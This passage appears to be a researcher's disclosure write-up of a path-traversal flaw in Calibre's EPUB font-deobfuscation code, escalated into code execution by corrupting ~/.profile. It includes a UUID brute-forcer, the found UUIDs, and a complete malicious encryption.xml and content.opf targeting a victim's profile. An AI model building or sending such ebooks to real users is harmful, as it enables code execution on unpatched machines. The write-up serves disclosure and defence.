~/.profile and brute-forcing a UUID that produces specific XOR output, this file corruption can be weaponized into code execution. When the victim logs in or sources their profile, attacker-controlled commands execute.
Vulnerability Chain: LFI → Arbitrary File Corruption → Code Execution
Introduction
Calibre is one of the most popular ebook management applications, with millions of users worldwide. It handles various ebook formats, converts between them, and manages libraries. Given its widespread use and the fact that users regularly open ebooks from untrusted sources (online libraries, torrents, email attachments), any vulnerability in Calibre's file processing is worth investigating.
This writeup details a vulnerability I discovered in Calibre 9.1.0's EPUB processing that chains together several weaknesses to achieve code execution from a malicious ebook file.
The Discovery
While auditing Calibre's source code, I focused on the EPUB conversion pipeline. EPUBs are essentially ZIP archives containing XML metadata, XHTML content, and embedded resources like fonts and images. One interesting feature caught my attention: IDPF font obfuscation.
The IDPF (International Digital Publishing Forum) specification includes a method for "obfuscating" embedded fonts to prevent casual extraction. This isn't encryption—it's a simple XOR operation using the book's UUID as a key. Calibre implements this in src/calibre/ebooks/conversion/plugins/epub_input.py.
The vulnerability lies in how Calibre resolves the paths to these "encrypted" resources.
Technical Deep Dive
The Vulnerable Code
In epub_input.py, the process_encryption() function handles font decryption:
def process_encryption(self, encfile, opf, log):
# ...
for em in root.xpath('descendant::*[contains(name(), "EncryptionMethod")]'):
cr = em.getparent().xpath('descendant::*[contains(name(), "CipherReference")]')[0]
uri = cr.get('URI') # Attacker-controlled from encryption.xml
# LINE 75 - PATH TRAVERSAL
path = os.path.abspath(os.path.join(os.path.dirname(encfile), '..', *uri.split('/')))
if (tkey and os.path.exists(path)):
decrypt_font(tkey, path, algorithm) # LINE 79 - Corrupts the file
The critical issues:
uriis extracted directly fromMETA-INF/encryption.xmlwithout any sanitization*uri.split('/')preserves..path componentsos.path.abspath()resolves the traversal, escaping the EPUB's extraction directorydecrypt_font()opens the resolved path in read-write mode and XORs its contents
The IDPF Obfuscation Algorithm
The decrypt_font() function implements IDPF's font obfuscation:
- Compute
SHA1(UUID)where UUID is from the book'scontent.opf - Take the first 20 bytes of the SHA1 hash as the XOR key
- XOR the first 1040 bytes of the target file with this key (repeating the 20-byte key)
def decrypt_font(tkey, path, algorithm):
# tkey = SHA1(UUID)[:20]
with open(path, 'r+b') as f:
data = f.read(1040)
# XOR operation
decrypted = bytes([data[i] ^ tkey[i % 20] for i in range(len(data))])
f.seek(0)
f.write(decrypted)
This means an attacker can:
- Use path traversal to target any file writable by Calibre
- XOR its first 1040 bytes with a key derived from a UUID the attacker controls
Exploitation: From Corruption to Code Execution
At first glance, XOR corruption seems like a limited primitive. The corruption is deterministic but depends on both the original file content and the UUID. How do we turn this into code execution?
The Key Insight
If we know the original content of a target file, we can calculate what XOR key we need to produce a desired output:
required_key = original_content XOR desired_output
Then we brute-force UUIDs until we find one whose SHA1(UUID) starts with our required key bytes.
Target Selection: Shell Initialization Scripts
On Linux/macOS systems, shell initialization scripts like ~/.profile, ~/.bashrc, and ~/.bash_profile are executed when a user logs in or starts a shell. These files commonly start with predictable content:
# ~/.profile: executed by the command interpreter for login shells.
The first 4 bytes are always # ~/ (hex: 23 20 7e 2f).
Crafting the Payload
I chose two payloads to demonstrate the vulnerability:
Payload 1: id;# - Executes the id command
- Target bytes:
# ~/→id;# - Hex:
23 20 7e 2f→69 64 3b 23 - Required XOR key:
4a 44 45 0c
Payload 2: sh;# - Spawns an interactive shell
- Target bytes:
# ~/→sh;# - Hex:
23 20 7e 2f→73 68 3b 23 - Required XOR key:
50 48 45 0c
The # at the end is crucial—it comments out the garbage bytes that follow (the rest of the XOR-corrupted line), preventing syntax errors.
Brute-Forcing the UUID
I wrote a multi-threaded C brute-forcer to find UUIDs whose SHA1 hash starts with the required bytes:
// Target key bytes for sh;# payload
static const uint8_t TARGET_KEY[4] = {0x50, 0x48, 0x45, 0x0c};
void *worker(void *arg) {
// ...
while (!found && val < 0x100000000ULL) {
snprintf(uuid_str, sizeof(uuid_str),
"urn:uuid:%08lx-0000-0000-0000-000000000000", val);
sha1((uint8_t *)uuid_str, 45, sha1_result);
if (sha1_result[0] == TARGET_KEY[0] &&
sha1_result[1] == TARGET_KEY[1] &&
sha1_result[2] == TARGET_KEY[2] &&
sha1_result[3] == TARGET_KEY[3]) {
found = 1;
// Winner!
}
val += num_workers;
}
}
On a 12-core CPU, finding a 4-byte match takes approximately 2-4 minutes.
Results:
[+] FOUND: urn:uuid:cf0909a3-0000-0000-0000-000000000000
SHA1: 4a44450c... (for id;# payload)
[+] FOUND: urn:uuid:ef9a993a-0000-0000-0000-000000000000
SHA1: 5048450c... (for sh;# payload)
Building the Malicious EPUB
An EPUB is a ZIP archive with a specific structure:
malicious.epub
├── mimetype # Must be first, uncompressed
├── META-INF/
│ ├── container.xml # Points to content.opf
│ └── encryption.xml # Contains path traversal payload
└── OEBPS/
├── content.opf # Contains our magic UUID
└── ch.xhtml # Minimal chapter content
The Path Traversal Payload (encryption.xml)
<?xml version="1.0" encoding="UTF-8"?>
<encryption xmlns="urn:oasis:names:tc:opendocument:xmlns:container"
xmlns:enc="http://www.w3.org/2001/04/xmlenc#">
<enc:EncryptedData>
<enc:EncryptionMethod Algorithm="http://www.idpf.org/2008/embedding"/>
<enc:CipherData>
<enc:CipherReference URI="../../../../../../../../../../home/victim/.profile"/>
</enc:CipherData>
</enc:EncryptedData>
</encryption>
The Magic UUID (content.opf)
<?xml version="1.0" encoding="UTF-8"?>
<package xmlns="http://www.idpf.org/2007/opf" unique-identifier="uid" version="2.0">
<metadata xmlns:dc="http://purl.org/dc/elements/1.1/">
<dc:title>Innocent Book</dc:title>
<dc:identifier id="uid">urn:uuid:ef9a993a-0000-0000-0000-000000000000</dc:identifier>
</metadata>
...
</package>
The Attack in Action
Step 1: Victim Receives Malicious EPUB
The attacker distributes the malicious EPUB through any channel—email attachment, file sharing, ebook piracy sites, or even compromised legitimate sources.
Step 2: Victim Converts the EPUB
When the victim uses Calibre to convert the ebook (GUI: "Convert books" or CLI: ebook-convert):
$ ebook-convert malicious.epub output.mobi
Step 3: File Corruption Occurs
During conversion, Calibre parses encryption.xml, resolves the traversal path to /home/victim/.profile, and XORs the first 1040 bytes.
Before:
# ~/.profile: executed by the command interpreter for login shells.
After:
sh;#<garbage bytes>
Step 4: Code Execution on Next Login
When the corrupted ~/.profile is sourced, sh;# is interpreted as a command, spawning an interactive shell. The # comments out the garbage bytes.
Impact Analysis
Direct Impacts
- Code Execution: Arbitrary commands execute in the user's shell context
- Persistence: The corruption persists across reboots until manually fixed
- System Instability: Broken initialization scripts cause environment issues
Exploitation Constraints
- Target file must exist and be writable by Calibre
- Target file must have predictable first N bytes
- Brute-force time increases exponentially with payload length:
- 4 bytes: ~2-4 minutes
- 5 bytes: ~10-17 hours
- 6+ bytes: Days to weeks
Platform Testing
| Platform | Interface | Status |
|---|---|---|
| Linux | CLI (ebook-convert) | Vulnerable |
| Windows | GUI (Convert books) | Vulnerable |
Root Cause Analysis
- Missing Input Validation: The
URIattribute fromencryption.xmlis used directly without sanitization - No Path Containment: Calibre doesn't verify that resolved paths remain within the EPUB extraction directory
- Unnecessary Write Access: The "decryption" operation opens files in read-write mode
- Trust in Untrusted Data: EPUB files from untrusted sources are processed with full privileges
Timeline
| Date | Event |
|---|---|
| 2025-02-01 | Vulnerability discovered |
| 2025-02-01 | Code execution escalation confirmed |
| 2026-02-06 | Vendor patch release |
| 2026-02-06 | Public disclosure |
Conclusion
This vulnerability demonstrates how a seemingly limited primitive (XOR file corruption) can be escalated to code execution through careful target selection and cryptographic brute-forcing. The attack requires user interaction (converting an ebook), but given Calibre's widespread use and the common practice of converting ebooks from untrusted sources, the real-world risk is significant.
The vulnerability affects both the GUI and CLI interfaces on Linux and Windows, making it a cross-platform threat. Users should update Calibre immediately.
Acknowledgments
Shoutout to Civiled for walking me through reversing the IDPF encryption algorithm. Figuring out how to weaponize the XOR corruption into controlled output felt like a real-life CTF challenge.